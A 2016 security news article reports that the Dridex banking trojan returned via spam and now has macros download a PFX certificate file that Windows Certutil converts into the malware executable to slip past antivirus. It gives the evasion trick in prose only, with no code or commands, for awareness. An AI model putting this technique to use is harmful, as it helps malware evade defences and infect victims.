New trick allows Dridex to bypass antivirus detection

Jun 3, 2016 02:40 GMT  ·  By

Dridex, the most infamous banking trojans of them all, received a major upgrade in the month of May, which security researchers say would allow it to bypass security software with greater ease.

For the past few years, Dridex has been one of the most active cyber-crime infrastructures on the planet, with the group behind this operation building several botnets through which they deliver their malware, exfiltrate funds, hide illegal transactions, and spam users, with both the Dridex malware and the Locky ransomware.

Dormant Dridex makes a comeback

In the past, there were several security firms that reported seeing a downscaling of Dridex activity and an increased focused on Locky spam. Most recently, multiple security firms have noticed one of the biggest spam floods in years delivering the Locky ransomware.

But this period of calm seems to have ended, if we are to take a look at Trend Micro's latest report, which claims that, on May 25, Dridex started making a comeback with new waves of spam email distributing the reputable banking trojan in massive numbers once again.

The security firm also says that Dridex itself has now changed as well and is using a new trick to infect computers.

Dridex poses as a certificate to evade antivirus detection

In the past, the trojan relied on malicious Microsoft Office files asking users to enable macro support. Once this happened, the malicious script would download Dridex and install on the victim's PC.

The most recent version of Dridex now features a change of M.O., and instead of downloading the Dridex malware, the macro scripts download a PFX (Personal Information Exchange) file, usually used by software certificates for storing public and private encryption keys for various operations.

"Perhaps, you are wondering why these cybercriminals added another layer in infecting systems," the Trend Micro team asks. "Since the file dropped is initially in .PFX format, it enables DRIDEX to bypass detection."

Antivirus and other security solutions usually recognize these types of files as friendly and mark them as such, ignoring them from future scans.

Dridex now abuses the built-in Windows Certutil utility

After the PFX files reach the infected host, the same macro script that downloaded it then starts Certutil, a Windows command-line utility built inside Windows for the specific purpose of handling certificates, as part of the Certificate Services, starting with Windows 8 and Windows Server 2012.

Certutil takes the PFX file and converts it into the Dridex EXE file, which can then infect your system. Since the antivirus has already marked this file as friendly, it won't keep an eye on it anymore, allowing Dridex to go under the radar.

The only solution to counteract this new change in Dridex's mode of operation is to, once again, remind employees and your friends not to open files from unknown senders.  

Geographical distribution of recent Dridex infections
Geographical distribution of recent Dridex infections

Photo Gallery (2 Images)

Dridex makes a comeback with new tricks
Geographical distribution of recent Dridex infections
Open gallery